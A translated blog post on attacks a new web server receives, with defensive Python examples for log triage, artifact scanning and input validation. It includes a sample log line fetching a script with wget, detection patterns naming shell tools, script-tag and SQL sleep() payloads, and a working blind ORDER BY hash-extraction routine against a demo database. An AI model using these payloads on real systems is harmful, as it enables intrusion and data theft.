How long can a web server run naked on the internet?

Posted by fierce at 2020-02-27

Source: Hengsheng R&D

Author: Tong Shihong

Link: (click "Read the original" at the end)

Reprinted with permission

We often put a web server on the public internet without a second thought. Look at its access log and you will see it receiving a large number of attack requests. What follows are the requests one such server received in the hours after its website went live.

1. Probing server information

One minute after going online, an OPTIONS request was logged.

From the response the attacker now knows that the server runs Apache on CentOS, and he can choose targeted attacks accordingly.

Tip: hide Apache's version information. Setting ServerTokens Prod and ServerSignature Off in httpd.conf reduces the Server header to a bare "Apache" and removes the version footer from error pages; the rest is covered in the books. Remember that hiding the banner only slows fingerprinting down; it does not remove the vulnerabilities behind it.

2. Command execution attacks

Half an hour online, the server received a large number of exploit attempts against web-server command-execution vulnerabilities.

If your server runs ASP or Struts2 with debugging mode enabled (most services come up with it on), congratulations: your safe lifetime on the network is half an hour, and after that the server has been taken over.
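The point of sections 1 and 2 is that the access log already shows the probe and the exploit attempts. As an added example (not from the original post), here is a small triage script that parses Apache combined-log lines and tags them. The log lines, the IP addresses and the signatures are constructed for this example; the signatures are coarse heuristics (an OPTIONS request, an OGNL-style ${ or %{ expression in the URL, a shell tool invoked after a command separator), not a definitive detection rule.

```python
"""Access-log triage, an added example (not from the original post).

Parses Apache combined-log lines and tags the probe and command-execution
attempts the post describes. All log lines, addresses and signatures below
are constructed for this example; the signatures are coarse heuristics."""
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

def fully_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double-encoded payloads become visible."""
    for _ in range(rounds):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    return s

# Heuristic signatures (assumptions for this example):
#   recon-options   : the OPTIONS probe from section 1
#   ognl-expression : ${...} / %{...} markers typical of Struts2 OGNL attempts
#   shell-command   : a shell tool invoked right after a command separator
SIGNATURES = [
    ("recon-options", lambda r: r["method"] == "OPTIONS"),
    ("ognl-expression", lambda r: re.search(r"[$%]\{", r["decoded_path"]) is not None),
    ("shell-command", lambda r: re.search(
        r"(?:;|\|\||&&|`|\n)\s*(?:wget|curl|nc|bash|sh|python|perl)\b",
        r["decoded_path"]) is not None),
]

def parse_line(line: str):
    """Return the parsed fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["decoded_path"] = fully_decode(rec["path"])
    return rec

def classify(rec) -> list:
    """Tags of every signature the record matches."""
    return [name for name, pred in SIGNATURES if pred(rec)]

def triage(lines):
    """Return {client_ip: Counter(tag -> hits)} for lines matching a signature."""
    hits = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.setdefault(rec["ip"], Counter()).update(tags)
    return hits

# Constructed sample log: an OPTIONS probe, an OGNL-style marker, a command
# injection attempt, and one ordinary page view (documentation-range IPs).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Feb/2020:08:01:03 +0800] "OPTIONS / HTTP/1.1" 200 - "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Feb/2020:08:31:10 +0800] "GET /index.action?redirect:${%23probe} HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Feb/2020:08:33:42 +0800] "GET /cgi-bin/test.cgi?;wget%20http://198.51.100.7/x.sh HTTP/1.1" 404 209 "-" "curl/7.29.0"',
    '192.0.2.9 - - [27/Feb/2020:08:40:00 +0800] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, counter in triage(SAMPLE_LOG).items():
        print(ip, dict(counter))
```

Run it against a real access log by feeding the file's lines to triage(); the decoded_path field is what the rules look at, because attackers encode the interesting characters and a rule that only sees the raw %24%7B form will miss them. The signatures are a starting point for tuning, not a replacement for patching.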

3. Configuration vulnerability: crawling the source code

Many projects manage their code with SVN and package it with Ant or Maven (practically all of them, it seems). If the packaging script is not configured correctly, the .svn directory ends up inside the war package. With SVN 1.6 and earlier every directory's .svn folder carries a pristine copy of each file, so the package then contains all of your source code. Ant's and Maven's default excludes skip .svn; a fileset that turns them off (defaultexcludes="no") or a hand-rolled copy step brings it back.

Someone will say: didn't I set robots.txt to tell him not to crawl my code?

Alas, robots.txt is a gentleman's agreement. Baidu, Google and the other search engines politely leave when they see an entry saying "don't crawl my content".

Everyone else reads that entry as a list of what is worth taking.

You must turn off directory listing, which the default configuration enables (Options Indexes); otherwise all your code will have been copied within four hours of the site opening.

4. Targeted vulnerability attacks

By this point the enemy knows you are running Apache and goes straight for Apache vulnerabilities.

If you are running a default Apache installation without security patches, your life is over. My estimate is that 80% of servers have fallen by now, having lived about eight hours. That's enough.

5. Attacking configuration vulnerabilities

We usually install installers, database tools and so on along with the system. Many MySQL users install phpMyAdmin, for example, but after installation almost nobody deletes its setup script (scripts/setup.php in the older versions).

Some security-conscious developers do delete files containing key information once they have been used, such as the database installation script, but forget that the file was edited along the way and that the editor automatically left a .bak copy behind.

Often you have not yet reported to your boss that installation is complete, and the enemy is already using the system with the initial password from your database.

On top of that, management demands more security awareness and stronger passwords, but there are too many passwords to remember, so someone writes them into a file and saves it on the server. The result is easy to guess.

There is also a Java scenario: the system has just gone online and needs monitoring, so jconsole or even a web console is opened (Tomcat is common, and its default manager console is right there). So it is convenient for you, and for everyone else.
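Sections 3 and 5 both come down to things in the build artifact that should never have shipped: .svn metadata, editor .bak copies, installer scripts, password files. As an added example (not the author's code), here is a pre-deployment check that opens a war (a zip file) and lists such entries. The war, its entries and the pattern list are constructed for this example; extend the patterns with whatever your own builds have leaked before.

```python
"""Pre-deployment scan of a build artifact, an added example (not from the post).

Builds a small .war in memory (a constructed sample, not a real project) and
scans it for the leftovers the post warns about: .svn metadata, editor backup
copies, installer/setup scripts and password files."""
import io
import re
import zipfile

# Entries that must never ship. The list is an assumption for this example.
RISKY_PATTERNS = [
    ("vcs-metadata", re.compile(r"(^|/)\.(svn|git|hg)(/|$)")),
    ("backup-copy", re.compile(r"\.(bak|old|orig|swp|~)$", re.I)),
    ("installer-script", re.compile(r"(^|/)(setup|install|upgrade)\.(php|jsp|asp|aspx)$", re.I)),
    ("credential-file", re.compile(r"(^|/)(passwords?|credentials?)\.(txt|xls|xlsx|docx?)$", re.I)),
]

def scan_archive(data: bytes):
    """Return [(entry_name, tag), ...] for every risky entry in the zip/war bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            for tag, pat in RISKY_PATTERNS:
                if pat.search(name):
                    findings.append((name, tag))
                    break  # first matching tag is enough
    return findings

def build_sample_war() -> bytes:
    """Constructed artifact mimicking an Ant/Maven package built from an SVN
    checkout with default excludes turned off and installer files left in."""
    entries = {
        "WEB-INF/web.xml": b"<web-app/>",
        "WEB-INF/classes/com/example/App.class": b"\xca\xfe\xba\xbe",
        "index.jsp": b"<%= 1 + 1 %>",
        ".svn/entries": b"10\n",
        "WEB-INF/.svn/text-base/web.xml.svn-base": b"<web-app/>",
        "setup.php": b"<?php /* installer */",
        "WEB-INF/db/init.sql.bak": b"INSERT INTO users VALUES ('admin', 'admin123');",
        "docs/passwords.txt": b"root / changeme",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in entries.items():
            zf.writestr(name, body)
    return buf.getvalue()

if __name__ == "__main__":
    import sys
    findings = scan_archive(build_sample_war())
    for name, tag in findings:
        print(f"{tag:18} {name}")
    # Fail the build if anything risky is inside the artifact.
    sys.exit(1 if findings else 0)
```

Wire scan_archive() into the packaging step and fail the build on any finding; a failing build is far cheaper than discovering the .bak copy of the database script in someone else's hands.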

6. Unsafe file storage

Administrators back up the system for the sake of safety. Many systems are user-friendly and can be backed up online; unfortunately, the backup files land in a web-accessible directory.

If the implementers installed the site without deleting the installer files, it is even more convenient.

Another scenario: logs are essential for troubleshooting, but the server is often not directly reachable. Fetching logs is a hassle, so opening remote access to them is convenient. It is just as convenient for the bad guys.

7. Configuration vulnerability: insecure permission settings

This is what it looks like when an Apache vulnerability is used to tamper with files: my home directory was writable, and something was added to it.

8. Operating system vulnerability: file execution vulnerability

Security-conscious developers keep files outside the web directory, which is much safer. But the files still have to be accessed, so the code reads them by path, and the attacker only needs to find that path. Once he does, the code is given away too.

9. Configuration vulnerability: don't start the service as administrator

Is creating a dedicated user to start the web service a hassle? Yes, and it is necessary.

You may think this is child's play. I found two things to clean up:

10. Script injection

You block <script, but do you block %3cscript? And the next variant of script? Or %3CS%43ript%3e?

This is why you want a whitelist rather than a blacklist!
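As an added example (not from the post), the script below runs the three payloads from this section against the naive blacklist, against the same blacklist after the input is canonicalised (percent-decoding repeated until stable, then case-folded), and against a whitelist for a username field. The username rule and the extra double-encoded payload are assumptions for this example.

```python
"""Blacklist vs whitelist for a user-supplied field, an added example
(not from the original post). Payloads and the username rule are constructed."""
import re
from urllib.parse import unquote

def blacklist_check(value: str) -> bool:
    """The naive filter from the post: accepts anything without a literal '<script'."""
    return "<script" not in value

def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until stable (handles double encoding), then case-fold,
    so %3cscript, %3CS%43ript%3e and %253Cscript%253E collapse to one form."""
    cur = value
    for _ in range(max_rounds):
        nxt = unquote(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur.casefold()

def blacklist_check_canonical(value: str) -> bool:
    """Same blacklist, but applied to the canonical form of the input."""
    return "<script" not in canonicalize(value)

# Whitelist for a username: only these characters, only this length (assumed rule).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")

def whitelist_check(value: str) -> bool:
    """Accepts only what the field may legitimately contain; no knowledge of
    the attacker's encoding tricks is needed."""
    return USERNAME_RE.fullmatch(value) is not None

# Constructed payloads: the three from the post plus a double-encoded one.
PAYLOADS = [
    "<script>alert(1)</script>",
    "%3cscript%3ealert(1)%3c/script%3e",
    "%3CS%43ript%3e",
    "%253Cscript%253E",
]

def evaluate():
    """Return {payload: (blacklist accepts, canonical blacklist accepts, whitelist accepts)}."""
    return {p: (blacklist_check(p), blacklist_check_canonical(p), whitelist_check(p))
            for p in PAYLOADS}

if __name__ == "__main__":
    for payload, (bl, bl_c, wl) in evaluate().items():
        print(f"{payload:40} blacklist={bl} canonical={bl_c} whitelist={wl}")
```

The naive blacklist lets three of the four payloads through. Canonicalising first closes those three, but it is still a chase: the next payload uses an entity, a different tag, or an event attribute, and the blacklist needs another rule. The whitelist rejects all of them without knowing any of those tricks, and it also rejects the fifth trick that has not been invented yet.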

11. SQL injection

Look at the tables in your database:

12. The back door that ends it

To make management easier, a back door is left behind to report statistics and, when appropriate, to allow remote management, something nobody else is supposed to know about.

If you want nobody to know about it, the only way is not to do it.

13. Overflow attacks and the third-party channel

An overflow attack aims to write past a buffer so that values beyond it on the stack are tampered with. I have not studied this part in depth. The first request looks more like a probe, the next more like an overflow attempt:

After that it is all ../../, at least several KB of it, presumably to find out the largest message HTTP will accept. (A long run of ../ is more usually a directory-traversal probe, but an oversized request also tests the server's input limits.)

The third-party channel matters because in most cases we defend against attacks coming in and rarely against data going out. The enemy is not there to fight your defences; he is there to steal your valuable content. Getting in is one thing, getting the loot out is another. Many servers can reach the web freely, which is the same as opening the door for the enemy's transport.

For example, your system has a SQL injection, but not a UNION injection, a blind one. The bad guy can still dump your database (drag the database) through it. But how does he get that dump back out?

If the application's user has high enough permissions, he can write the file into an externally accessible directory. If not, a third-party channel has to be set up. The second line in the first figure of this section registers the attacker's details on his own server. Once registration succeeds, that HTTP channel can carry data out on later visits, or even connect on port 80 to the attacker's trojan control program. From then on it is as convenient as your remote desktop.

So remember to forbid outbound connections from the server! Restricting the web server to reach only specific back-end systems such as the database is essential; anything it legitimately needs from the outside, such as package updates, should go through a proxy you control.

14. SQL blind injection

What is blind SQL injection? Injection with your eyes closed. For example, your ORDER BY clause is built by string concatenation, and there is no way to pull data out with UNION in that position. So how does the attacker tell whether the injection worked?

If this request is accepted, it produces the SQL statement: select .. from .. order by if(now()=sysdate(), sleep(9), 0)

now() must equal sysdate(). How stupid is the enemy!

You are right, now() does equal sysdate(). If the injection succeeds, the request will not return for nine seconds; otherwise it returns immediately. The delay is the answer, and it is all the attacker needs.

Another example is injection into INSERT and UPDATE. They return no data, but:

If the injection succeeds, the response is delayed by three seconds. Next time the attacker can play here, for example writing a shutdown; or drop table tb_users
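The post's payload relies on MySQL's sleep() so that a delay is the signal. As an added example (not the author's code), the script below goes one step beyond the text: it uses SQLite, which has no sleep(), and shows that when the injection point is ORDER BY the row order itself can serve as the signal, so a password hash can be read out one character at a time through a clause that never returns data. It then shows the whitelist fix that removes the injection point entirely. Tables, rows and hashes are constructed for this example.

```python
"""Blind injection through ORDER BY, an added example (not from the post).

Boolean-based variant of the post's time-based trick: a CASE in ORDER BY
sorts one way when a guess about the data is true and another way when it
is false, so the row order leaks one bit per request. Data is constructed."""
import sqlite3

def make_db():
    """In-memory database with a user table (the target) and a product table
    (the page whose sort order the attacker controls)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tb_users(id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT);
        INSERT INTO tb_users VALUES (1, 'zed', 'c0ffee'), (2, 'amy', 'deadbeef');
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        INSERT INTO products VALUES (1, 'pear', 3), (2, 'apple', 1);
    """)
    return conn

def list_products_vulnerable(conn, sort: str):
    """The post's mistake: the sort parameter is concatenated into ORDER BY."""
    sql = "SELECT name FROM products ORDER BY " + sort
    return [row[0] for row in conn.execute(sql)]

# Whitelist: the user picks a key, the code supplies the column name.
ALLOWED_SORT = {"name": "name", "price": "price"}

def list_products_fixed(conn, sort: str):
    """Only known keys reach the SQL text; anything else is rejected outright."""
    col = ALLOWED_SORT.get(sort)
    if col is None:
        raise ValueError("unsupported sort key")
    return [row[0] for row in conn.execute(f"SELECT name FROM products ORDER BY {col}")]

def guess_pw_hash(conn, user_id: int, alphabet: str = "0123456789abcdef", max_len: int = 32):
    """Recover tb_users.pw_hash for one user through the vulnerable endpoint.
    ORDER BY CASE WHEN <guess> THEN id ELSE -id END yields ['pear', 'apple']
    when the guess is true and ['apple', 'pear'] when it is false."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                f"CASE WHEN substr((SELECT pw_hash FROM tb_users WHERE id={user_id}),"
                f"{pos},1)='{ch}' THEN id ELSE -id END"
            )
            if list_products_vulnerable(conn, payload) == ["pear", "apple"]:
                recovered += ch
                break
        else:
            break  # no character matched: past the end of the string
    return recovered

if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", guess_pw_hash(db, 1))
    print("fixed endpoint, sort=price:", list_products_fixed(db, "price"))
    try:
        list_products_fixed(db, "price; DROP TABLE tb_users")
    except ValueError as e:
        print("fixed endpoint rejects injection:", e)
```

In MySQL the same CASE expression works just as well as sleep(), and it is faster and quieter because nothing waits. The fix is the same in every database: never concatenate into ORDER BY (or LIMIT, or a table name), since those positions cannot be parameterised; map the user's choice to a column through a whitelist as list_products_fixed() does.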


There are far too many automated tools now; a script kiddie with no professional skill at all can penetrate your website. Some people online say 80% of machines are zombies ("broilers"). Judging by the attacks this server received as soon as it came up, that is no exaggeration. Without a systematic security programme, surviving eight hours once you are on the internet is not easy.
